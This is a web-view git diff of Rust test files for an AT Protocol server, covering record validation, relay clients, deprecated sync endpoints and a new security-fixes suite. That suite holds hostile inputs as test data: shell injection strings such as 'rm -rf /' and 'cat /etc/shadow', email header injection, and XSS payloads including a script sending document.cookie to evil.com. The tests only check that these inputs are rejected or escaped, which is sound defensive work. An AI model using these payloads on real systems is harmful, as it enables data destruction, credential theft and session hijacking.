let max_key = "k".repeat(512);
|
||||
assert!(validate_record_key(&max_key).is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_collection_nsid_valid() {
|
||||
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
|
||||
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
|
||||
assert!(validate_collection_nsid("a.b.c").is_ok());
|
||||
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_collection_nsid_empty() {
|
||||
let result = validate_collection_nsid("");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_collection_nsid_too_few_segments() {
|
||||
assert!(validate_collection_nsid("a").is_err());
|
||||
assert!(validate_collection_nsid("a.b").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_collection_nsid_empty_segment() {
|
||||
assert!(validate_collection_nsid("a..b.c").is_err());
|
||||
assert!(validate_collection_nsid(".a.b.c").is_err());
|
||||
assert!(validate_collection_nsid("a.b.c.").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_collection_nsid_invalid_chars() {
|
||||
assert!(validate_collection_nsid("a.b.c/d").is_err());
|
||||
assert!(validate_collection_nsid("a.b.c_d").is_err());
|
||||
assert!(validate_collection_nsid("a.b.c@d").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_threadgate() {
|
||||
let validator = RecordValidator::new();
|
||||
let gate = json!({
|
||||
"$type": "app.bsky.feed.threadgate",
|
||||
"post": "at://did:plc:test/app.bsky.feed.post/123",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_labeler_service() {
|
||||
let validator = RecordValidator::new();
|
||||
let labeler = json!({
|
||||
"$type": "app.bsky.labeler.service",
|
||||
"policies": {
|
||||
"labelValues": ["spam", "nsfw"]
|
||||
},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&labeler, "app.bsky.labeler.service");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_list_item() {
|
||||
let validator = RecordValidator::new();
|
||||
let item = json!({
|
||||
"$type": "app.bsky.graph.listitem",
|
||||
"subject": "did:plc:test123",
|
||||
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&item, "app.bsky.graph.listitem");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
@@ -1,86 +0,0 @@
|
||||
mod common;
|
||||
use common::*;
|
||||
|
||||
use axum::{extract::ws::Message, routing::get, Router};
|
||||
use bspds::{
|
||||
state::AppState,
|
||||
sync::{firehose::SequencedEvent, relay_client::start_relay_clients},
|
||||
};
|
||||
use chrono::Utc;
|
||||
use tokio::net::TcpListener;
|
||||
use tokio::sync::mpsc;
|
||||
|
||||
async fn mock_relay_server(
|
||||
listener: TcpListener,
|
||||
event_tx: mpsc::Sender<Vec<u8>>,
|
||||
connected_tx: mpsc::Sender<()>,
|
||||
) {
|
||||
let handler = |ws: axum::extract::ws::WebSocketUpgrade| async {
|
||||
ws.on_upgrade(move |mut socket| async move {
|
||||
let _ = connected_tx.send(()).await;
|
||||
while let Some(Ok(msg)) = socket.recv().await {
|
||||
if let Message::Binary(bytes) = msg {
|
||||
let _ = event_tx.send(bytes.to_vec()).await;
|
||||
break;
|
||||
}
|
||||
}
|
||||
})
|
||||
};
|
||||
let app = Router::new().route("/", get(handler));
|
||||
|
||||
axum::serve(listener, app.into_make_service())
|
||||
.await
|
||||
.unwrap();
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_outbound_relay_client() {
|
||||
let listener = TcpListener::bind("127.0.0.1:0").await.unwrap();
|
||||
let addr = listener.local_addr().unwrap();
|
||||
let (event_tx, mut event_rx) = mpsc::channel(1);
|
||||
let (connected_tx, _connected_rx) = mpsc::channel::<()>(1);
|
||||
tokio::spawn(mock_relay_server(listener, event_tx, connected_tx));
|
||||
let relay_url = format!("ws://{}", addr);
|
||||
|
||||
let db_url = get_db_connection_string().await;
|
||||
let pool = sqlx::postgres::PgPoolOptions::new()
|
||||
.connect(&db_url)
|
||||
.await
|
||||
.unwrap();
|
||||
let state = AppState::new(pool).await;
|
||||
|
||||
let (ready_tx, ready_rx) = mpsc::channel(1);
|
||||
start_relay_clients(state.clone(), vec![relay_url], Some(ready_rx)).await;
|
||||
|
||||
tokio::time::timeout(
|
||||
tokio::time::Duration::from_secs(5),
|
||||
async {
|
||||
ready_tx.closed().await;
|
||||
}
|
||||
)
|
||||
.await
|
||||
.expect("Timeout waiting for relay client to be ready");
|
||||
|
||||
let dummy_event = SequencedEvent {
|
||||
seq: 1,
|
||||
did: "did:plc:test".to_string(),
|
||||
created_at: Utc::now(),
|
||||
event_type: "commit".to_string(),
|
||||
commit_cid: Some("bafyreihffx5a4o3qbv7vp6qmxpxok5mx5xvlsq6z4x3xv3zqv7vqvc7mzy".to_string()),
|
||||
prev_cid: None,
|
||||
ops: Some(serde_json::json!([])),
|
||||
blobs: Some(vec![]),
|
||||
blocks_cids: Some(vec![]),
|
||||
};
|
||||
state.firehose_tx.send(dummy_event).unwrap();
|
||||
|
||||
let received_bytes = tokio::time::timeout(
|
||||
tokio::time::Duration::from_secs(5),
|
||||
event_rx.recv()
|
||||
)
|
||||
.await
|
||||
.expect("Timeout waiting for event")
|
||||
.expect("Event channel closed");
|
||||
|
||||
assert!(!received_bytes.is_empty());
|
||||
}
|
||||
377
tests/security_fixes.rs
Normal file
377
tests/security_fixes.rs
Normal file
@@ -0,0 +1,377 @@
|
||||
mod common;
|
||||
|
||||
use bspds::notifications::{
|
||||
SendError, is_valid_phone_number, sanitize_header_value,
|
||||
};
|
||||
use bspds::oauth::templates::{login_page, error_page, success_page};
|
||||
use bspds::image::{ImageProcessor, ImageError};
|
||||
|
||||
#[test]
|
||||
fn test_sanitize_header_value_removes_crlf() {
|
||||
let malicious = "Injected\r\nBcc: attacker@evil.com";
|
||||
let sanitized = sanitize_header_value(malicious);
|
||||
|
||||
assert!(!sanitized.contains('\r'), "CR should be removed");
|
||||
assert!(!sanitized.contains('\n'), "LF should be removed");
|
||||
assert!(sanitized.contains("Injected"), "Original content should be preserved");
|
||||
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sanitize_header_value_preserves_content() {
|
||||
let normal = "Normal Subject Line";
|
||||
let sanitized = sanitize_header_value(normal);
|
||||
|
||||
assert_eq!(sanitized, "Normal Subject Line");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sanitize_header_value_trims_whitespace() {
|
||||
let padded = " Subject ";
|
||||
let sanitized = sanitize_header_value(padded);
|
||||
|
||||
assert_eq!(sanitized, "Subject");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sanitize_header_value_handles_multiple_newlines() {
|
||||
let input = "Line1\r\nLine2\nLine3\rLine4";
|
||||
let sanitized = sanitize_header_value(input);
|
||||
|
||||
assert!(!sanitized.contains('\r'), "CR should be removed");
|
||||
assert!(!sanitized.contains('\n'), "LF should be removed");
|
||||
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
|
||||
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_email_header_injection_sanitization() {
|
||||
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
|
||||
let sanitized = sanitize_header_value(header_injection);
|
||||
|
||||
let lines: Vec<&str> = sanitized.split("\r\n").collect();
|
||||
assert_eq!(lines.len(), 1, "Should be a single line after sanitization");
|
||||
assert!(sanitized.contains("Normal Subject"), "Original content preserved");
|
||||
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
|
||||
assert!(sanitized.contains("X-Injected:"), "All content on same line");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_accepts_correct_format() {
|
||||
assert!(is_valid_phone_number("+1234567890"));
|
||||
assert!(is_valid_phone_number("+12025551234"));
|
||||
assert!(is_valid_phone_number("+442071234567"));
|
||||
assert!(is_valid_phone_number("+4915123456789"));
|
||||
assert!(is_valid_phone_number("+1"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_missing_plus() {
|
||||
assert!(!is_valid_phone_number("1234567890"));
|
||||
assert!(!is_valid_phone_number("12025551234"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_empty() {
|
||||
assert!(!is_valid_phone_number(""));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_just_plus() {
|
||||
assert!(!is_valid_phone_number("+"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_too_long() {
|
||||
assert!(!is_valid_phone_number("+12345678901234567890123"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_letters() {
|
||||
assert!(!is_valid_phone_number("+abc123"));
|
||||
assert!(!is_valid_phone_number("+1234abc"));
|
||||
assert!(!is_valid_phone_number("+a"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_spaces() {
|
||||
assert!(!is_valid_phone_number("+1234 5678"));
|
||||
assert!(!is_valid_phone_number("+ 1234567890"));
|
||||
assert!(!is_valid_phone_number("+1 "));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_special_chars() {
|
||||
assert!(!is_valid_phone_number("+123-456-7890"));
|
||||
assert!(!is_valid_phone_number("+1(234)567890"));
|
||||
assert!(!is_valid_phone_number("+1.234.567.890"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_signal_recipient_command_injection_blocked() {
|
||||
let malicious_inputs = vec![
|
||||
"+123; rm -rf /",
|
||||
"+123 && cat /etc/passwd",
|
||||
"+123`id`",
|
||||
"+123$(whoami)",
|
||||
"+123|cat /etc/shadow",
|
||||
"+123\n--help",
|
||||
"+123\r\n--version",
|
||||
"+123--help",
|
||||
];
|
||||
|
||||
for input in malicious_inputs {
|
||||
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_image_file_size_limit_enforced() {
|
||||
let processor = ImageProcessor::new();
|
||||
|
||||
let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024];
|
||||
|
||||
let result = processor.process(&oversized_data, "image/jpeg");
|
||||
|
||||
match result {
|
||||
Err(ImageError::FileTooLarge { .. }) => {}
|
||||
Err(other) => {
|
||||
let msg = format!("{:?}", other);
|
||||
if !msg.to_lowercase().contains("size") && !msg.to_lowercase().contains("large") {
|
||||
panic!("Expected FileTooLarge error, got: {:?}", other);
|
||||
}
|
||||
}
|
||||
Ok(_) => panic!("Should reject files over size limit"),
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_image_file_size_limit_configurable() {
|
||||
let processor = ImageProcessor::new().with_max_file_size(1024);
|
||||
|
||||
let data: Vec<u8> = vec![0u8; 2048];
|
||||
|
||||
let result = processor.process(&data, "image/jpeg");
|
||||
|
||||
assert!(result.is_err(), "Should reject files over configured limit");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_client_id() {
|
||||
let malicious_client_id = "<script>alert('xss')</script>";
|
||||
let html = login_page(malicious_client_id, None, None, "test-uri", None, None);
|
||||
|
||||
assert!(!html.contains("<script>"), "Script tags should be escaped");
|
||||
assert!(html.contains("<script>"), "HTML entities should be used for escaping");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_client_name() {
|
||||
let malicious_client_name = "<img src=x onerror=alert('xss')>";
|
||||
let html = login_page("client123", Some(malicious_client_name), None, "test-uri", None, None);
|
||||
|
||||
assert!(!html.contains("<img "), "IMG tags should be escaped");
|
||||
assert!(html.contains("<img"), "IMG tag should be escaped as HTML entity");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_scope() {
|
||||
let malicious_scope = "\"><script>alert('xss')</script>";
|
||||
let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None);
|
||||
|
||||
assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_error_message() {
|
||||
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
|
||||
let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None);
|
||||
|
||||
assert!(!html.contains("<script>"), "Script tags in error should be escaped");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_login_hint() {
|
||||
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
|
||||
let html = login_page("client123", None, None, "test-uri", None, Some(malicious_hint));
|
||||
|
||||
assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
|
||||
assert!(html.contains("""), "Quotes should be escaped");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_request_uri() {
|
||||
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
|
||||
let html = login_page("client123", None, None, malicious_uri, None, None);
|
||||
|
||||
assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_error_page_xss_escaping() {
|
||||
let malicious_error = "<script>steal()</script>";
|
||||
let malicious_desc = "<img src=x onerror=evil()>";
|
||||
|
||||
let html = error_page(malicious_error, Some(malicious_desc));
|
||||
|
||||
assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
|
||||
assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_success_page_xss_escaping() {
|
||||
let malicious_name = "<script>steal_session()</script>";
|
||||
|
||||
let html = success_page(Some(malicious_name));
|
||||
|
||||
assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_no_javascript_urls() {
|
||||
let html = login_page("client123", None, None, "test-uri", None, None);
|
||||
assert!(!html.contains("javascript:"), "Login page should not contain javascript: URLs");
|
||||
|
||||
let error_html = error_page("test_error", None);
|
||||
assert!(!error_html.contains("javascript:"), "Error page should not contain javascript: URLs");
|
||||
|
||||
let success_html = success_page(None);
|
||||
assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_form_action_safe() {
|
||||
let malicious_uri = "javascript:alert('xss')//";
|
||||
let html = login_page("client123", None, None, malicious_uri, None, None);
|
||||
|
||||
assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_send_error_types_have_display() {
|
||||
let timeout = SendError::Timeout;
|
||||
let max_retries = SendError::MaxRetriesExceeded("test".to_string());
|
||||
let invalid_recipient = SendError::InvalidRecipient("bad recipient".to_string());
|
||||
|
||||
assert!(!format!("{}", timeout).is_empty());
|
||||
assert!(!format!("{}", max_retries).is_empty());
|
||||
assert!(!format!("{}", invalid_recipient).is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_send_error_timeout_message() {
|
||||
let error = SendError::Timeout;
|
||||
let msg = format!("{}", error);
|
||||
assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_send_error_max_retries_includes_detail() {
|
||||
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
|
||||
let msg = format!("{}", error);
|
||||
assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_check_signup_queue_accepts_session_jwt() {
|
||||
use common::{base_url, client, create_account_and_login};
|
||||
|
||||
let base = base_url().await;
|
||||
let http_client = client();
|
||||
|
||||
let (token, _did) = create_account_and_login(&http_client).await;
|
||||
|
||||
let res = http_client
|
||||
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
|
||||
.header("Authorization", format!("Bearer {}", token))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert_eq!(res.status(), reqwest::StatusCode::OK, "Session JWTs should be accepted");
|
||||
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["activated"], true);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_check_signup_queue_no_auth() {
|
||||
use common::{base_url, client};
|
||||
|
||||
let base = base_url().await;
|
||||
let http_client = client();
|
||||
|
||||
let res = http_client
|
||||
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert_eq!(res.status(), reqwest::StatusCode::OK, "No auth should work");
|
||||
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["activated"], true);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_html_escape_ampersand() {
|
||||
let html = login_page("client&test", None, None, "test-uri", None, None);
|
||||
assert!(html.contains("&"), "Ampersand should be escaped");
|
||||
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_html_escape_quotes() {
|
||||
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
|
||||
assert!(html.contains(""") || html.contains("""), "Double quotes should be escaped");
|
||||
assert!(html.contains("'") || html.contains("'"), "Single quotes should be escaped");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_html_escape_angle_brackets() {
|
||||
let html = login_page("client<test>more", None, None, "test-uri", None, None);
|
||||
assert!(html.contains("<"), "Less than should be escaped");
|
||||
assert!(html.contains(">"), "Greater than should be escaped");
|
||||
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_preserves_safe_content() {
|
||||
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
|
||||
|
||||
assert!(html.contains("my-safe-client") || html.contains("My Safe App"), "Safe content should be preserved");
|
||||
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
|
||||
assert!(html.contains("user@example.com"), "Login hint should be preserved");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_csrf_like_input_value_protection() {
|
||||
let malicious = "\" onclick=\"alert('csrf')";
|
||||
let html = login_page("client", None, None, malicious, None, None);
|
||||
|
||||
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_unicode_handling_in_templates() {
|
||||
let unicode_client = "客户端 クライアント";
|
||||
let html = login_page(unicode_client, None, None, "test-uri", None, None);
|
||||
|
||||
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_null_byte_in_input() {
|
||||
let with_null = "client\0id";
|
||||
let sanitized = sanitize_header_value(with_null);
|
||||
|
||||
assert!(sanitized.contains("client"), "Content before null should be preserved");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_very_long_input_handling() {
|
||||
let long_input = "x".repeat(10000);
|
||||
let sanitized = sanitize_header_value(&long_input);
|
||||
|
||||
assert!(!sanitized.is_empty(), "Long input should still produce output");
|
||||
}
|
||||
307
tests/sync_deprecated.rs
Normal file
307
tests/sync_deprecated.rs
Normal file
@@ -0,0 +1,307 @@
|
||||
mod common;
|
||||
mod helpers;
|
||||
use common::*;
|
||||
use helpers::*;
|
||||
|
||||
use reqwest::StatusCode;
|
||||
use serde_json::Value;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_success() {
|
||||
let client = client();
|
||||
let (did, _jwt) = setup_new_user("gethead-success").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert!(body["root"].is_string());
|
||||
let root = body["root"].as_str().unwrap();
|
||||
assert!(root.starts_with("bafy"), "Root CID should be a CID");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_not_found() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", "did:plc:nonexistent12345")])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert_eq!(body["error"], "HeadNotFound");
|
||||
assert!(body["message"].as_str().unwrap().contains("Could not find root"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_missing_param() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_empty_did() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", "")])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert_eq!(body["error"], "InvalidRequest");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_whitespace_did() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", " ")])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_changes_after_record_create() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("gethead-changes").await;
|
||||
|
||||
let res1 = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get initial head");
|
||||
let body1: Value = res1.json().await.unwrap();
|
||||
let head1 = body1["root"].as_str().unwrap().to_string();
|
||||
|
||||
create_post(&client, &did, &jwt, "Post to change head").await;
|
||||
|
||||
let res2 = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get head after record");
|
||||
let body2: Value = res2.json().await.unwrap();
|
||||
let head2 = body2["root"].as_str().unwrap().to_string();
|
||||
|
||||
assert_ne!(head1, head2, "Head CID should change after record creation");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_success() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("getcheckout-success").await;
|
||||
|
||||
create_post(&client, &did, &jwt, "Post for checkout test").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
assert_eq!(
|
||||
res.headers()
|
||||
.get("content-type")
|
||||
.and_then(|h| h.to_str().ok()),
|
||||
Some("application/vnd.ipld.car")
|
||||
);
|
||||
let body = res.bytes().await.expect("Failed to get body");
|
||||
assert!(!body.is_empty(), "CAR file should not be empty");
|
||||
assert!(body.len() > 50, "CAR file should contain actual data");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_not_found() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", "did:plc:nonexistent12345")])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::NOT_FOUND);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert_eq!(body["error"], "RepoNotFound");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_missing_param() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_empty_did() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", "")])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_empty_repo() {
|
||||
let client = client();
|
||||
let (did, _jwt) = setup_new_user("getcheckout-empty").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body = res.bytes().await.expect("Failed to get body");
|
||||
assert!(!body.is_empty(), "Even empty repo should return CAR header");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_includes_multiple_records() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("getcheckout-multi").await;
|
||||
|
||||
for i in 0..5 {
|
||||
tokio::time::sleep(std::time::Duration::from_millis(50)).await;
|
||||
create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
|
||||
}
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body = res.bytes().await.expect("Failed to get body");
|
||||
assert!(body.len() > 500, "CAR file with 5 records should be larger");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_matches_latest_commit() {
|
||||
let client = client();
|
||||
let (did, _jwt) = setup_new_user("gethead-matches-latest").await;
|
||||
|
||||
let head_res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get head");
|
||||
let head_body: Value = head_res.json().await.unwrap();
|
||||
let head_root = head_body["root"].as_str().unwrap();
|
||||
|
||||
let latest_res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getLatestCommit",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get latest commit");
|
||||
let latest_body: Value = latest_res.json().await.unwrap();
|
||||
let latest_cid = latest_body["cid"].as_str().unwrap();
|
||||
|
||||
assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_car_header_valid() {
|
||||
let client = client();
|
||||
let (did, _jwt) = setup_new_user("getcheckout-header").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body = res.bytes().await.expect("Failed to get body");
|
||||
|
||||
assert!(body.len() >= 2, "CAR file should have at least header length");
|
||||
}
|
||||
Reference in New Issue
Block a user